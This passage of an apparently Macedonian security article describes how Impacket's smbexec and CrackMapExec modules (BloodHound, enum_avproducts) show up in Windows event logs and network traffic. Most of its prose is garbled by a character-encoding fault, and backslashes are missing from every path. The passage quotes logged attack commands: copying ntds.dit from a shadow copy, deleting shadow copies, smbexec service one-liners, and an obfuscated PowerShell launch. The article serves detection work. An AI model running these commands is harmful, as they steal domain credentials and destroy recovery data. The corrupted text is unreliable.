"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
7. 4688 - ΡΠΎΠ·Π΄Π°Π²Π°ΡΠ΅ ΠΏΡΠΎΡΠ΅Ρ ΡΠΎ ΠΊΠΎΠΌΠ°Π½Π΄Π°ΡΠ°:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
Π‘ΠΌΠ±Π΅ΠΊΡΠ΅Ρ
ΠΠ°ΠΊΠΎ ΠΈ ΠΌΠ½ΠΎΠ³Ρ Π°Π»Π°ΡΠΊΠΈ ΠΏΠΎ Π΅ΠΊΡΠΏΠ»ΠΎΠ°ΡΠ°ΡΠΈΡΠ°, Impacket ΠΈΠΌΠ° ΠΌΠΎΠ΄ΡΠ»ΠΈ Π·Π° Π΄Π°Π»Π΅ΡΠΈΠ½ΡΠΊΠΎ ΠΈΠ·Π²ΡΡΡΠ²Π°ΡΠ΅ Π½Π° ΠΊΠΎΠΌΠ°Π½Π΄ΠΈ. ΠΠ΅ ΡΠ΅ ΡΠΎΠΊΡΡΠΈΡΠ°ΠΌΠ΅ Π½Π° smbexec, ΠΊΠΎΡ ΠΎΠ±Π΅Π·Π±Π΅Π΄ΡΠ²Π° ΠΈΠ½ΡΠ΅ΡΠ°ΠΊΡΠΈΠ²Π½Π° ΠΊΠΎΠΌΠ°Π½Π΄Π½Π° ΠΎΠ±Π²ΠΈΠ²ΠΊΠ° Π½Π° ΠΎΠ΄Π΄Π°Π»Π΅ΡΠ΅Π½Π° ΠΌΠ°ΡΠΈΠ½Π°. ΠΠ²ΠΎΡ ΠΌΠΎΠ΄ΡΠ» ΠΈΡΡΠΎ ΡΠ°ΠΊΠ° Π±Π°ΡΠ° Π°Π²ΡΠ΅Π½ΡΠΈΠΊΠ°ΡΠΈΡΠ° ΠΏΡΠ΅ΠΊΡ SMB, ΠΈΠ»ΠΈ ΡΠΎ Π»ΠΎΠ·ΠΈΠ½ΠΊΠ° ΠΈΠ»ΠΈ Ρ Π°Ρ Π½Π° Π»ΠΎΠ·ΠΈΠ½ΠΊΠ°. ΠΠ° ΡΠ». ΠΠ° ΡΠ»ΠΈΠΊΠ° 3 Π³Π»Π΅Π΄Π°ΠΌΠ΅ ΠΏΡΠΈΠΌΠ΅Ρ ΠΊΠ°ΠΊΠΎ ΡΡΠ½ΠΊΡΠΈΠΎΠ½ΠΈΡΠ° ΡΠ°ΠΊΠ²Π°ΡΠ° Π°Π»Π°ΡΠΊΠ°, Π²ΠΎ ΠΎΠ²ΠΎΡ ΡΠ»ΡΡΠ°Ρ ΡΠΎΠ° Π΅ Π»ΠΎΠΊΠ°Π»Π½Π°ΡΠ° Π°Π΄ΠΌΠΈΠ½ΠΈΡΡΡΠ°ΡΠΎΡΡΠΊΠ° ΠΊΠΎΠ½Π·ΠΎΠ»Π°.
ΠΡΠΈΠ·. 3. ΠΠ½ΡΠ΅ΡΠ°ΠΊΡΠΈΠ²Π½Π° smbexec ΠΊΠΎΠ½Π·ΠΎΠ»Π°
ΠΡΠ²ΠΈΠΎΡ ΡΠ΅ΠΊΠΎΡ Π½Π° smbexec ΠΏΠΎ Π°Π²ΡΠ΅Π½ΡΠΈΠΊΠ°ΡΠΈΡΠ°ΡΠ° Π΅ Π΄Π° ΡΠ΅ ΠΎΡΠ²ΠΎΡΠΈ SCM ΡΠΎ ΠΊΠΎΠΌΠ°Π½Π΄Π°ΡΠ° OpenSCManagerW (15). ΠΡΠ°ΡΠ°ΡΠ΅ΡΠΎ Π΅ Π·Π°Π±Π΅Π»Π΅ΠΆΠ»ΠΈΠ²ΠΎ: ΠΏΠΎΠ»Π΅ΡΠΎ MachineName Π΅ DUMMY.
ΠΡΠΈΠ·. 4. ΠΠ°ΡΠ°ΡΠ΅ Π·Π° ΠΎΡΠ²ΠΎΡΠ°ΡΠ΅ Π½Π° Π£ΠΏΡΠ°Π²Π½ΠΈΠΊΠΎΡ Π·Π° ΠΊΠΎΠ½ΡΡΠΎΠ»Π° Π½Π° ΡΡΠ»ΡΠ³ΠΈ
Π‘Π»Π΅Π΄Π½ΠΎ, ΡΡΠ»ΡΠ³Π°ΡΠ° ΡΠ΅ ΠΊΡΠ΅ΠΈΡΠ° ΡΠΎ ΠΏΠΎΠΌΠΎΡ Π½Π° ΠΊΠΎΠΌΠ°Π½Π΄Π°ΡΠ° CreateServiceW (12). ΠΠΎ ΡΠ»ΡΡΠ°ΡΠΎΡ Π½Π° smbexec, ΠΌΠΎΠΆΠ΅ΠΌΠ΅ Π΄Π° ΡΠ° Π²ΠΈΠ΄ΠΈΠΌΠ΅ ΠΈΡΡΠ°ΡΠ° Π»ΠΎΠ³ΠΈΠΊΠ° Π½Π° ΠΊΠΎΠ½ΡΡΡΡΠΊΡΠΈΡΠ° Π½Π° ΠΊΠΎΠΌΠ°Π½Π΄Π°ΡΠ° ΡΠ΅ΠΊΠΎΡ ΠΏΠ°Ρ. ΠΠ° ΡΠ». 5 Π·Π΅Π»Π΅Π½Π°ΡΠ° ΠΎΠ·Π½Π°ΡΡΠ²Π° Π½Π΅ΠΏΡΠΎΠΌΠ΅Π½Π»ΠΈΠ²ΠΈ ΠΊΠΎΠΌΠ°Π½Π΄Π½ΠΈ ΠΏΠ°ΡΠ°ΠΌΠ΅ΡΡΠΈ, ΠΆΠΎΠ»ΡΠ°ΡΠ° ΠΎΠ·Π½Π°ΡΡΠ²Π° ΡΡΠΎ ΠΌΠΎΠΆΠ΅ Π΄Π° ΠΏΡΠΎΠΌΠ΅Π½ΠΈ Π½Π°ΠΏΠ°ΡΠ°ΡΠΎΡ. ΠΠ΅ΡΠ½ΠΎ Π΅ Π΄Π° ΡΠ΅ Π²ΠΈΠ΄ΠΈ Π΄Π΅ΠΊΠ° ΠΈΠΌΠ΅ΡΠΎ Π½Π° ΠΈΠ·Π²ΡΡΠ½Π°ΡΠ° Π΄Π°ΡΠΎΡΠ΅ΠΊΠ°, Π½Π΅Π³ΠΎΠ²ΠΈΠΎΡ Π΄ΠΈΡΠ΅ΠΊΡΠΎΡΠΈΡΠΌ ΠΈ ΠΈΠ·Π»Π΅Π·Π½Π°ΡΠ° Π΄Π°ΡΠΎΡΠ΅ΠΊΠ° ΠΌΠΎΠΆΠ΅ Π΄Π° ΡΠ΅ ΡΠΌΠ΅Π½Π°Ρ, Π½ΠΎ ΠΎΡΡΠ°Π½Π°ΡΠΎΡΠΎ Π΅ ΠΌΠ½ΠΎΠ³Ρ ΠΏΠΎΡΠ΅ΡΠΊΠΎ Π΄Π° ΡΠ΅ ΠΏΡΠΎΠΌΠ΅Π½ΠΈ Π±Π΅Π· Π΄Π° ΡΠ΅ Π½Π°ΡΡΡΠΈ Π»ΠΎΠ³ΠΈΠΊΠ°ΡΠ° Π½Π° ΠΌΠΎΠ΄ΡΠ»ΠΎΡ Impacket.
ΠΡΠΈΠ·. 5. ΠΠΎΠ±Π°ΡΠ°ΡΡΠ΅ Π΄Π° ΠΊΡΠ΅ΠΈΡΠ°ΡΠ΅ ΡΡΠ»ΡΠ³Π° ΠΊΠΎΡΠΈΡΡΠ΅ΡΡΠΈ Π£ΠΏΡΠ°Π²Π½ΠΈΠΊ Π·Π° ΠΊΠΎΠ½ΡΡΠΎΠ»Π° Π½Π° ΡΡΠ»ΡΠ³ΠΈ
Smbexec ΠΈΡΡΠΎ ΡΠ°ΠΊΠ° ΠΎΡΡΠ°Π²Π° ΠΎΡΠΈΠ³Π»Π΅Π΄Π½ΠΈ ΡΡΠ°Π³ΠΈ Π²ΠΎ Π΄Π½Π΅Π²Π½ΠΈΠΊΠΎΡ Π·Π° Π½Π°ΡΡΠ°Π½ΠΈ Π½Π° Windows. ΠΠΎ Π΄Π½Π΅Π²Π½ΠΈΠΊΠΎΡ Π½Π° Windows Server 2016 Π·Π° ΠΈΠ½ΡΠ΅ΡΠ°ΠΊΡΠΈΠ²Π½Π°ΡΠ° ΠΊΠΎΠΌΠ°Π½Π΄Π½Π° ΡΠΊΠΎΠ»ΠΊΠ° ΡΠΎ ΠΊΠΎΠΌΠ°Π½Π΄Π°ΡΠ° ipconfig, ΡΠ΅ ΡΠ° Π²ΠΈΠ΄ΠΈΠΌΠ΅ ΡΠ»Π΅Π΄Π½Π°ΡΠ° ΠΊΠ»ΡΡΠ½Π° Π½ΠΈΠ·Π° Π½Π° Π½Π°ΡΡΠ°Π½ΠΈ:
1. 4697 β ΠΈΠ½ΡΡΠ°Π»Π°ΡΠΈΡΠ° Π½Π° ΡΡΠ»ΡΠ³Π°ΡΠ° Π½Π° ΠΌΠ°ΡΠΈΠ½Π°ΡΠ° Π½Π° ΠΆΡΡΠ²Π°ΡΠ°:
%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
2. 4688 - ΠΊΡΠ΅ΠΈΡΠ°ΡΠ΅ Π½Π° ΠΏΡΠΎΡΠ΅ΡΠΎΡ cmd.exe ΡΠΎ Π°ΡΠ³ΡΠΌΠ΅Π½ΡΠΈΡΠ΅ ΠΎΠ΄ ΡΠΎΡΠΊΠ° 1.
3. 5145 - ΠΏΡΠΎΠ²Π΅ΡΠΊΠ° Π½Π° ΠΏΡΠ°Π²Π°ΡΠ° Π·Π° ΠΏΡΠΈΡΡΠ°ΠΏ Π΄ΠΎ Π΄Π°ΡΠΎΡΠ΅ΠΊΠ°ΡΠ° __output Π²ΠΎ Π΄ΠΈΡΠ΅ΠΊΡΠΎΡΠΈΡΠΌΠΎΡ C$.
4. 4697 β ΠΈΠ½ΡΡΠ°Π»Π°ΡΠΈΡΠ° Π½Π° ΡΡΠ»ΡΠ³Π°ΡΠ° Π½Π° ΠΌΠ°ΡΠΈΠ½Π°ΡΠ° Π½Π° ΠΆΡΡΠ²Π°ΡΠ°.
%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
5. 4688 - ΠΊΡΠ΅ΠΈΡΠ°ΡΠ΅ Π½Π° ΠΏΡΠΎΡΠ΅ΡΠΎΡ cmd.exe ΡΠΎ Π°ΡΠ³ΡΠΌΠ΅Π½ΡΠΈΡΠ΅ ΠΎΠ΄ ΡΠΎΡΠΊΠ° 4.
6. 5145 - ΠΏΡΠΎΠ²Π΅ΡΠΊΠ° Π½Π° ΠΏΡΠ°Π²Π°ΡΠ° Π·Π° ΠΏΡΠΈΡΡΠ°ΠΏ Π΄ΠΎ Π΄Π°ΡΠΎΡΠ΅ΠΊΠ°ΡΠ° __output Π²ΠΎ Π΄ΠΈΡΠ΅ΠΊΡΠΎΡΠΈΡΠΌΠΎΡ C$.
ΠΠΌΠΏΠ°ΠΊΠ΅Ρ Π΅ ΠΎΡΠ½ΠΎΠ²Π° Π·Π° ΡΠ°Π·Π²ΠΎΡ Π½Π° Π°Π»Π°ΡΠΊΠΈ Π·Π° Π½Π°ΠΏΠ°Π΄. ΠΠΈ ΠΏΠΎΠ΄Π΄ΡΠΆΡΠ²Π° ΡΠΊΠΎΡΠΎ ΡΠΈΡΠ΅ ΠΏΡΠΎΡΠΎΠΊΠΎΠ»ΠΈ Π²ΠΎ Windows ΠΈΠ½ΡΡΠ°ΡΡΡΡΠΊΡΡΡΠ°ΡΠ° ΠΈ Π²ΠΎ ΠΈΡΡΠΎ Π²ΡΠ΅ΠΌΠ΅ ΠΈΠΌΠ° ΡΠ²ΠΎΠΈ ΠΊΠ°ΡΠ°ΠΊΡΠ΅ΡΠΈΡΡΠΈΡΠ½ΠΈ ΠΊΠ°ΡΠ°ΠΊΡΠ΅ΡΠΈΡΡΠΈΠΊΠΈ. ΠΠ²Π΅ ΡΠΏΠ΅ΡΠΈΡΠΈΡΠ½ΠΈ Π±Π°ΡΠ°ΡΠ° winreg ΠΈ ΡΠΏΠΎΡΡΠ΅Π±Π°ΡΠ° Π½Π° SCM API ΡΠΎ ΠΊΠ°ΡΠ°ΠΊΡΠ΅ΡΠΈΡΡΠΈΡΠ½ΠΎ ΡΠΎΡΠΌΠΈΡΠ°ΡΠ΅ ΠΊΠΎΠΌΠ°Π½Π΄ΠΈ, ΠΈ ΡΠΎΡΠΌΠ°ΡΠΎΡ Π½Π° ΠΈΠΌΠ΅ΡΠΎ Π½Π° Π΄Π°ΡΠΎΡΠ΅ΠΊΠ°ΡΠ° ΠΈ SMB share SYSTEM32.
CRACKMAPEXEC
ΠΠ»Π°ΡΠΊΠ°ΡΠ° CME Π΅ Π΄ΠΈΠ·Π°ΡΠ½ΠΈΡΠ°Π½Π° ΠΏΡΠ²Π΅Π½ΡΡΠ²Π΅Π½ΠΎ Π΄Π° Π³ΠΈ Π°Π²ΡΠΎΠΌΠ°ΡΠΈΠ·ΠΈΡΠ° ΠΎΠ½ΠΈΠ΅ ΡΡΡΠΈΠ½ΡΠΊΠΈ Π΄Π΅ΡΡΡΠ²Π° ΡΡΠΎ Π½Π°ΠΏΠ°ΡΠ°ΡΠΎΡ ΡΡΠ΅Π±Π° Π΄Π° Π³ΠΈ ΠΈΠ·Π²ΡΡΠΈ Π·Π° Π΄Π° Π½Π°ΠΏΡΠ΅Π΄ΡΠ²Π° Π²ΠΎ ΠΌΡΠ΅ΠΆΠ°ΡΠ°. ΠΠΈ ΠΎΠ²ΠΎΠ·ΠΌΠΎΠΆΡΠ²Π° Π΄Π° ΡΠ°Π±ΠΎΡΠΈΡΠ΅ Π·Π°Π΅Π΄Π½ΠΎ ΡΠΎ Π΄ΠΎΠ±ΡΠΎ ΠΏΠΎΠ·Π½Π°ΡΠΈΠΎΡ Π°Π³Π΅Π½Ρ Π½Π° Empire ΠΈ Meterpreter. ΠΠ° ΡΠ°ΡΠ½ΠΎ ΠΈΠ·Π²ΡΡΡΠ²Π°ΡΠ΅ Π½Π° ΠΊΠΎΠΌΠ°Π½Π΄ΠΈΡΠ΅, CME ΠΌΠΎΠΆΠ΅ Π΄Π° Π³ΠΈ Π·Π°ΠΌΠ°Π³Π»ΠΈ. ΠΠΎΡΠΈΡΡΠ΅ΡΡΠΈ Bloodhound (ΠΏΠΎΡΠ΅Π±Π½Π° Π°Π»Π°ΡΠΊΠ° Π·Π° ΠΈΠ·Π²ΠΈΠ΄ΡΠ²Π°ΡΠ΅), Π½Π°ΠΏΠ°ΡΠ°ΡΠΎΡ ΠΌΠΎΠΆΠ΅ Π΄Π° Π³ΠΎ Π°Π²ΡΠΎΠΌΠ°ΡΠΈΠ·ΠΈΡΠ° ΠΏΡΠ΅Π±Π°ΡΡΠ²Π°ΡΠ΅ΡΠΎ Π·Π° Π°ΠΊΡΠΈΠ²Π½Π° ΡΠ΅ΡΠΈΡΠ° Π½Π° Π°Π΄ΠΌΠΈΠ½ΠΈΡΡΡΠ°ΡΠΎΡ Π½Π° Π΄ΠΎΠΌΠ΅Π½.
bloodhound
Bloodhound, ΠΊΠ°ΠΊΠΎ ΡΠ°ΠΌΠΎΡΡΠΎΡΠ½Π° Π°Π»Π°ΡΠΊΠ°, ΠΎΠ²ΠΎΠ·ΠΌΠΎΠΆΡΠ²Π° Π½Π°ΠΏΡΠ΅Π΄Π½ΠΎ ΠΈΠ·Π²ΠΈΠ΄ΡΠ²Π°ΡΠ΅ Π²ΠΎ ΡΠ°ΠΌΠΊΠΈΡΠ΅ Π½Π° ΠΌΡΠ΅ΠΆΠ°ΡΠ°. Π‘ΠΎΠ±ΠΈΡΠ° ΠΏΠΎΠ΄Π°ΡΠΎΡΠΈ Π·Π° ΠΊΠΎΡΠΈΡΠ½ΠΈΡΠΈ, ΠΌΠ°ΡΠΈΠ½ΠΈ, Π³ΡΡΠΏΠΈ, ΡΠ΅ΡΠΈΠΈ ΠΈ ΡΠ΅ Π΄ΠΎΡΡΠ°Π²ΡΠ²Π° ΠΊΠ°ΠΊΠΎ ΡΠΊΡΠΈΠΏΡΠ° PowerShell ΠΈΠ»ΠΈ Π±ΠΈΠ½Π°ΡΠ½Π° Π΄Π°ΡΠΎΡΠ΅ΠΊΠ°. LDAP ΠΈΠ»ΠΈ SMB-Π±Π°Π·ΠΈΡΠ°Π½ΠΈ ΠΏΡΠΎΡΠΎΠΊΠΎΠ»ΠΈ ΡΠ΅ ΠΊΠΎΡΠΈΡΡΠ°Ρ Π·Π° ΡΠΎΠ±ΠΈΡΠ°ΡΠ΅ ΠΈΠ½ΡΠΎΡΠΌΠ°ΡΠΈΠΈ. ΠΠΎΠ΄ΡΠ»ΠΎΡ Π·Π° ΠΈΠ½ΡΠ΅Π³ΡΠ°ΡΠΈΡΠ° CME Π΄ΠΎΠ·Π²ΠΎΠ»ΡΠ²Π° Bloodhound Π΄Π° ΡΠ΅ ΠΏΡΠ΅Π·Π΅ΠΌΠ΅ Π²ΠΎ ΠΌΠ°ΡΠΈΠ½Π°ΡΠ° Π½Π° ΠΆΡΡΠ²Π°ΡΠ°, Π΄Π° ΡΠ°Π±ΠΎΡΠΈ ΠΈ Π΄Π° Π³ΠΈ ΠΏΡΠΈΠΌΠ° ΡΠΎΠ±ΡΠ°Π½ΠΈΡΠ΅ ΠΏΠΎΠ΄Π°ΡΠΎΡΠΈ ΠΏΠΎ ΠΈΠ·Π²ΡΡΡΠ²Π°ΡΠ΅ΡΠΎ, Π° ΡΠΎ ΡΠΎΠ° Π΄Π° Π³ΠΈ Π°Π²ΡΠΎΠΌΠ°ΡΠΈΠ·ΠΈΡΠ° Π΄Π΅ΡΡΡΠ²Π°ΡΠ° Π²ΠΎ ΡΠΈΡΡΠ΅ΠΌΠΎΡ ΠΈ Π΄Π° Π³ΠΈ Π½Π°ΠΏΡΠ°Π²ΠΈ ΠΏΠΎΠΌΠ°Π»ΠΊΡ Π·Π°Π±Π΅Π»Π΅ΠΆΠ»ΠΈΠ²ΠΈ. ΠΡΠ°ΡΠΈΡΠΊΠ°ΡΠ° ΠΎΠ±Π²ΠΈΠ²ΠΊΠ° Bloodhound Π³ΠΈ ΠΏΡΠΈΠΊΠ°ΠΆΡΠ²Π° ΡΠΎΠ±ΡΠ°Π½ΠΈΡΠ΅ ΠΏΠΎΠ΄Π°ΡΠΎΡΠΈ Π²ΠΎ ΡΠΎΡΠΌΠ° Π½Π° Π³ΡΠ°ΡΠΈΠΊΠΎΠ½ΠΈ, ΡΡΠΎ Π²ΠΈ ΠΎΠ²ΠΎΠ·ΠΌΠΎΠΆΡΠ²Π° Π΄Π° ΡΠ° ΠΏΡΠΎΠ½Π°ΡΠ΄Π΅ΡΠ΅ Π½Π°ΡΠΊΡΠ°ΡΠΊΠ°ΡΠ° ΠΏΠ°ΡΠ΅ΠΊΠ° ΠΎΠ΄ ΠΌΠ°ΡΠΈΠ½Π°ΡΠ° Π½Π° Π½Π°ΠΏΠ°ΡΠ°ΡΠΎΡ Π΄ΠΎ Π°Π΄ΠΌΠΈΠ½ΠΈΡΡΡΠ°ΡΠΎΡΠΎΡ Π½Π° Π΄ΠΎΠΌΠ΅Π½ΠΎΡ.
ΠΡΠΈΠ·. 6. ΠΠ½ΡΠ΅ΡΡΠ΅ΡΡ Bloodhound
ΠΠ° Π΄Π° ΡΠ°Π±ΠΎΡΠΈ Π½Π° ΠΌΠ°ΡΠΈΠ½Π°ΡΠ° Π½Π° ΠΆΡΡΠ²Π°ΡΠ°, ΠΌΠΎΠ΄ΡΠ»ΠΎΡ ΡΠΎΠ·Π΄Π°Π²Π° Π·Π°Π΄Π°ΡΠ° ΠΊΠΎΡΠΈΡΡΠ΅ΡΡΠΈ ATSVC ΠΈ SMB. ATSVC Π΅ ΠΈΠ½ΡΠ΅ΡΡΠ΅ΡΡ Π·Π° ΡΠ°Π±ΠΎΡΠ° ΡΠΎ Windows Task Scheduler. CME ΡΠ° ΠΊΠΎΡΠΈΡΡΠΈ ΡΠ²ΠΎΡΠ°ΡΠ° ΡΡΠ½ΠΊΡΠΈΡΠ° NetrJobAdd(1) Π·Π° ΠΊΡΠ΅ΠΈΡΠ°ΡΠ΅ Π·Π°Π΄Π°ΡΠΈ ΠΏΡΠ΅ΠΊΡ ΠΌΡΠ΅ΠΆΠ°ΡΠ°. ΠΡΠΈΠΌΠ΅Ρ Π·Π° ΡΠΎΠ° ΡΡΠΎ ΠΈΡΠΏΡΠ°ΡΠ° ΠΌΠΎΠ΄ΡΠ»ΠΎΡ CME Π΅ ΠΏΡΠΈΠΊΠ°ΠΆΠ°Π½ Π½Π° ΡΠ». 7: ΠΠ²Π° Π΅ ΠΊΠΎΠΌΠ°Π½Π΄Π΅Π½ ΠΏΠΎΠ²ΠΈΠΊ cmd.exe ΠΈ Π·Π°ΠΌΠ°ΡΠ΅Π½ ΠΊΠΎΠ΄ Π²ΠΎ ΡΠΎΡΠΌΠ° Π½Π° Π°ΡΠ³ΡΠΌΠ΅Π½ΡΠΈ Π²ΠΎ XML ΡΠΎΡΠΌΠ°Ρ.
Π‘Π».7. ΠΡΠ΅ΠΈΡΠ°ΡΠ΅ Π·Π°Π΄Π°ΡΠ° ΠΏΡΠ΅ΠΊΡ CME
ΠΡΠΊΠ°ΠΊΠΎ Π·Π°Π΄Π°ΡΠ°ΡΠ° Π΅ ΠΏΠΎΠ΄Π½Π΅ΡΠ΅Π½Π° Π·Π° ΠΈΠ·Π²ΡΡΡΠ²Π°ΡΠ΅, ΠΌΠ°ΡΠΈΠ½Π°ΡΠ° Π½Π° ΠΆΡΡΠ²Π°ΡΠ° Π³ΠΎ ΡΡΠ°ΡΡΡΠ²Π° ΡΠ°ΠΌΠΈΠΎΡ Bloodhound, Π° ΡΠΎΠ° ΠΌΠΎΠΆΠ΅ Π΄Π° ΡΠ΅ Π²ΠΈΠ΄ΠΈ Π²ΠΎ ΡΠΎΠΎΠ±ΡΠ°ΡΠ°ΡΠΎΡ. ΠΠΎΠ΄ΡΠ»ΠΎΡ ΡΠ΅ ΠΊΠ°ΡΠ°ΠΊΡΠ΅ΡΠΈΠ·ΠΈΡΠ° ΡΠΎ LDAP Π±Π°ΡΠ°ΡΠ° Π·Π° Π΄Π° ΡΠ΅ Π΄ΠΎΠ±ΠΈΡΠ°Ρ ΡΡΠ°Π½Π΄Π°ΡΠ΄Π½ΠΈ Π³ΡΡΠΏΠΈ, ΡΠΏΠΈΡΠΎΠΊ Π½Π° ΡΠΈΡΠ΅ ΠΌΠ°ΡΠΈΠ½ΠΈ ΠΈ ΠΊΠΎΡΠΈΡΠ½ΠΈΡΠΈ Π²ΠΎ Π΄ΠΎΠΌΠ΅Π½ΠΎΡ ΠΈ Π΄Π° ΡΠ΅ Π΄ΠΎΠ±ΠΈΡΠ°Ρ ΠΈΠ½ΡΠΎΡΠΌΠ°ΡΠΈΠΈ Π·Π° Π°ΠΊΡΠΈΠ²Π½ΠΈΡΠ΅ ΠΊΠΎΡΠΈΡΠ½ΠΈΡΠΊΠΈ ΡΠ΅ΡΠΈΠΈ ΠΏΡΠ΅ΠΊΡ Π±Π°ΡΠ°ΡΠ΅ΡΠΎ SRVSVC NetSessEnum.
ΠΡΠΈΠ·. 8. ΠΠΎΠ±ΠΈΠ²Π°ΡΠ΅ Π»ΠΈΡΡΠ° Π½Π° Π°ΠΊΡΠΈΠ²Π½ΠΈ ΡΠ΅ΡΠΈΠΈ ΠΏΡΠ΅ΠΊΡ SMB
ΠΠΎΠΏΠΎΠ»Π½ΠΈΡΠ΅Π»Π½ΠΎ, ΡΡΠ°ΡΡΡΠ²Π°ΡΠ΅ΡΠΎ Π½Π° Bloodhound Π½Π° ΠΌΠ°ΡΠΈΠ½Π°ΡΠ° Π½Π° ΠΆΡΡΠ²Π°ΡΠ° ΡΠΎ ΠΎΠ²ΠΎΠ·ΠΌΠΎΠΆΠ΅Π½Π° ΡΠ΅Π²ΠΈΠ·ΠΈΡΠ° Π΅ ΠΏΡΠΈΠ΄ΡΡΠΆΠ΅Π½ΠΎ ΡΠΎ Π½Π°ΡΡΠ°Π½ ΡΠΎ ID 4688 (ΡΠΎΠ·Π΄Π°Π²Π°ΡΠ΅ ΠΏΡΠΎΡΠ΅Ρ) ΠΈ ΠΈΠΌΠ΅ Π½Π° ΠΏΡΠΎΡΠ΅ΡΠΎΡ Β«C:WindowsSystem32cmd.exeΒ»
. ΠΠ½Π° ΡΡΠΎ Π΅ Π·Π°Π±Π΅Π»Π΅ΠΆΠ»ΠΈΠ²ΠΎ Π·Π° ΡΠΎΠ° ΡΠ΅ Π°ΡΠ³ΡΠΌΠ΅Π½ΡΠΈΡΠ΅ Π½Π° ΠΊΠΎΠΌΠ°Π½Π΄Π½Π°ΡΠ° Π»ΠΈΠ½ΠΈΡΠ°:
cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , β¦ , 40,41 )-jOIN'' ) "
Enum_avproducts
ΠΠΎΠ΄ΡΠ»ΠΎΡ enum_avproducts Π΅ ΠΌΠ½ΠΎΠ³Ρ ΠΈΠ½ΡΠ΅ΡΠ΅ΡΠ΅Π½ ΠΎΠ΄ Π³Π»Π΅Π΄Π½Π° ΡΠΎΡΠΊΠ° Π½Π° ΡΡΠ½ΠΊΡΠΈΠΎΠ½Π°Π»Π½ΠΎΡΡ ΠΈ ΠΈΠΌΠΏΠ»Π΅ΠΌΠ΅Π½ΡΠ°ΡΠΈΡΠ°. WMI Π²ΠΈ ΠΎΠ²ΠΎΠ·ΠΌΠΎΠΆΡΠ²Π° Π΄Π° Π³ΠΎ ΠΊΠΎΡΠΈΡΡΠΈΡΠ΅ ΡΠ°Π·ΠΈΠΊΠΎΡ Π·Π° ΠΏΡΠ΅Π±Π°ΡΡΠ²Π°ΡΠ΅ Π½Π° WQL Π·Π° Π²ΡΠ°ΡΠ°ΡΠ΅ Π½Π° ΠΏΠΎΠ΄Π°ΡΠΎΡΠΈ ΠΎΠ΄ ΡΠ°Π·Π»ΠΈΡΠ½ΠΈ ΠΎΠ±ΡΠ΅ΠΊΡΠΈ Π½Π° Windows, ΡΡΠΎ Π²ΠΎ ΡΡΡΡΠΈΠ½Π° Π³ΠΎ ΠΊΠΎΡΠΈΡΡΠΈ ΠΎΠ²ΠΎΡ CME ΠΌΠΎΠ΄ΡΠ». Π’ΠΎΡ Π³Π΅Π½Π΅ΡΠΈΡΠ° ΠΏΡΠ°ΡΠ°ΡΠ° Π΄ΠΎ ΠΊΠ»Π°ΡΠΈΡΠ΅ AntiSpywareProduct ΠΈ AntiΠirusProduct Π·Π° Π°Π»Π°ΡΠΊΠΈΡΠ΅ Π·Π° Π·Π°ΡΡΠΈΡΠ° ΠΈΠ½ΡΡΠ°Π»ΠΈΡΠ°Π½ΠΈ Π½Π° ΠΌΠ°ΡΠΈΠ½Π°ΡΠ° Π½Π° ΠΆΡΡΠ²Π°ΡΠ°. Π‘ΠΎ ΡΠ΅Π» Π΄Π° ΡΠ΅ Π΄ΠΎΠ±ΠΈΡΠ°Ρ ΠΏΠΎΡΡΠ΅Π±Π½ΠΈΡΠ΅ ΠΏΠΎΠ΄Π°ΡΠΎΡΠΈ, ΠΌΠΎΠ΄ΡΠ»ΠΎΡ ΡΠ΅ ΠΏΠΎΠ²ΡΠ·ΡΠ²Π° ΡΠΎ ΠΈΠΌΠ΅Π½ΡΠΊΠΈΠΎΡ ΠΏΡΠΎΡΡΠΎΡ rootSecurityCenter2, ΠΏΠΎΡΠΎΠ° Π³Π΅Π½Π΅ΡΠΈΡΠ° WQL Π±Π°ΡΠ°ΡΠ΅ ΠΈ Π΄ΠΎΠ±ΠΈΠ²Π° ΠΎΠ΄Π³ΠΎΠ²ΠΎΡ. ΠΠ° ΡΠ». Π‘Π»ΠΈΠΊΠ° 9 ΡΠ° ΠΏΡΠΈΠΊΠ°ΠΆΡΠ²Π° ΡΠΎΠ΄ΡΠΆΠΈΠ½Π°ΡΠ° Π½Π° ΡΠ°ΠΊΠ²ΠΈΡΠ΅ Π±Π°ΡΠ°ΡΠ° ΠΈ ΠΎΠ΄Π³ΠΎΠ²ΠΎΡΠΈ. ΠΠΎ Π½Π°ΡΠΈΠΎΡ ΠΏΡΠΈΠΌΠ΅Ρ, Π±Π΅ΡΠ΅ ΠΏΡΠΎΠ½Π°ΡΠ΄Π΅Π½ Windows Defender.
ΠΡΠΈΠ·. 9. ΠΡΠ΅ΠΆΠ½Π° Π°ΠΊΡΠΈΠ²Π½ΠΎΡΡ Π½Π° ΠΌΠΎΠ΄ΡΠ»ΠΎΡ enum_avproducts
